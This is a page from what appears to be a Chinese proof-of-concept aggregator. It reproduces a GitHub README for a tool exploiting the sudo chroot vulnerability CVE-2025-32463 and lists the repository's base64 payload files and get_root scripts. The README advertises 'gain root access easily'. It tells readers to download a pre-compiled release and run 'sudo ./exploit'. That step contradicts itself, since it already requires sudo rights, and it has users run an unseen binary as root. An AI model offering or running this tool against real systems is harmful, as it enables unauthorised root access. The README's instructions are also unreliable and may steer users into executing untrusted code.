POC详情: abe8c50467c5a553fb17af8f9a0120748962aa76

来源
关联漏洞
标题: Sudo 安全漏洞 (CVE-2025-32463)
描述:Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.9.17p1之前版本存在安全漏洞,该漏洞源于使用用户控制目录中的/etc/nsswitch.conf可能导致获取root访问权限。
描述
🔒 Elevate privileges to root via sudo without requiring gcc on the target system. Simplify exploit execution with pre-compiled payloads.
介绍
# 🛡️ CVE-2025-32463 - Gain Root Access Easily

## 🚀 Getting Started

This guide will help you download and run the CVE-2025-32463 application to gain privilege escalation to root using `sudo chroot`. You do not need to have `gcc` installed.

## 📥 Download Now

[![Download CVE-2025-32463](https://img.shields.io/badge/Download-CVE--2025--32463-blue.svg)](https://github.com/no-speech-to-text/CVE-2025-32463/releases)

## 📂 Download & Install

To get started, visit this page to download the latest version of the software: [Releases Page](https://github.com/no-speech-to-text/CVE-2025-32463/releases). Here, you will find the downloads you need for your operating system.

## 🔍 Overview

CVE-2025-32463 is a tool designed to exploit a privilege escalation vulnerability. It utilizes the `sudo` command in combination with `chroot` to grant root access on Linux systems. This vulnerability affects various Linux distributions, including Ubuntu.

### 🛠️ System Requirements

- **Operating System:** Linux (Ubuntu preferred)
- **Privileges:** You must have sudo access on your system.
- **Memory:** At least 512 MB of RAM.
- **Storage:** Minimum of 100 MB available space.

## 📑 Features

- Gain root access easily and quickly.
- No need for a compiler like `gcc`.
- Simple interface that anyone can use.
- Works on popular Linux distributions.

## 📖 How to Use

1. **Download the Application:**
   - Visit the [Releases Page](https://github.com/no-speech-to-text/CVE-2025-32463/releases) and find the latest version.
   - Download the appropriate file for your system.

2. **Extract the Files:**
   - Navigate to your Downloads folder or wherever you saved the file.
   - Right-click on the downloaded file and select "Extract Here" to decompress the files.

3. **Open a Terminal:**
   - Use the search bar on your computer to find and open the Terminal application.
   
4. **Navigate to the Folder:**
   - Use the `cd` command to change directory to the folder containing the extracted files. For example:
     ```bash
     cd ~/Downloads/CVE-2025-32463
     ```

5. **Run the Exploit:**
   - Enter the following command in the Terminal:
     ```bash
     sudo ./exploit
     ```
   - Follow any on-screen prompts as needed.

6. **Access Root:**
   - Once the command completes, you should have root access. Verify by entering:
     ```bash
     whoami
     ```
   - The output should show "root".

## ❓ Troubleshooting

- **Permission Issues:** Ensure you have the necessary sudo privileges. If you lack access, contact your system administrator.
  
- **Unable to execute the file:** Make sure the file is executable. Use:
  ```bash
  chmod +x exploit
  ```

- **Dependencies Not Found:** Ensure your system is updated and meets the system requirements listed above.

## 🗂️ Support

If you need assistance, visit the [Issues Page](https://github.com/no-speech-to-text/CVE-2025-32463/issues) on GitHub. You can report bugs or provide feedback.

## 🤝 Contributing

We welcome contributions! If you wish to contribute, please read our guidelines on the [Contribution Page](https://github.com/no-speech-to-text/CVE-2025-32463/contributing). 

## 📌 License

This project is licensed under the MIT License. See the [LICENSE](https://github.com/no-speech-to-text/CVE-2025-32463/blob/main/LICENSE) file for more details. 

## 💬 Community

Join our community for discussions and updates. Follow us on social media or check out forums for tips from other users.

## 🏁 Conclusion

With CVE-2025-32463, gaining root access is streamlined. Enjoy enhanced control over your Linux system without complex setups. For any further information, refer back to this README or the links provided above.
文件快照

[4.0K] /data/pocs/abe8c50467c5a553fb17af8f9a0120748962aa76 ├── [4.0K] archs-dynamic │   ├── [ 91K] king.aarch64.b64 │   ├── [ 89K] king.armv7l.b64 │   ├── [ 19K] king.i386.b64 │   ├── [ 10K] king.riscv64.b64 │   └── [ 20K] king.x86_64.b64 ├── [4.0K] archs-static │   ├── [ 28K] king.aarch64.b64 │   ├── [ 26K] king.armv7l.b64 │   ├── [ 29K] king.i386.b64 │   ├── [9.5K] king.riscv64.b64 │   └── [ 31K] king.x86_64.b64 ├── [2.4K] get_root.py ├── [1.7K] get_root.sh ├── [1.0K] LICENSE ├── [ 989] mkall-dynamic.sh └── [3.6K] README.md 2 directories, 15 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。